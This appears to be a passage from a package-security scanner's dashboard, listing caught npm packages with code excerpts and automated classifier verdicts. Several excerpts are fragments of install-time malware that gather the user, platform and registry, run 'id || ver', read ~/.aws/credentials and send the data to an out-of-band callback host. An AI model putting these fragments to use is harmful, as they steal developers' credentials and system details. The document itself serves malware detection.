Every caught package that currently matches this cluster's axis, replayed live over the last 7 days. Snippets show where the cluster identifier appears in the package's static excerpt or which takeover heuristic fired.
const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.stllm: Sends to suspicious destination: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.
const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.stllm: Sends to suspicious destination: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.
import Conf from 'conf'; import axios from 'axios';
llm: No suspicious destination, no remote-exec shape — 1 other host(s).
let imports = {}; imports['__wbindgen_placeholder__'] = module.exports; let wasm; const { TextDecoder, TextEncoder } = require(`util`);llm: No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
try{data+=fs.readFileSync(home+'/.aws/credentials','utf8')}catch(e){}llm: Credential read (reads-aws-creds, reads-npmrc) paired with http-to-public-ip destination — classic exfiltration signature.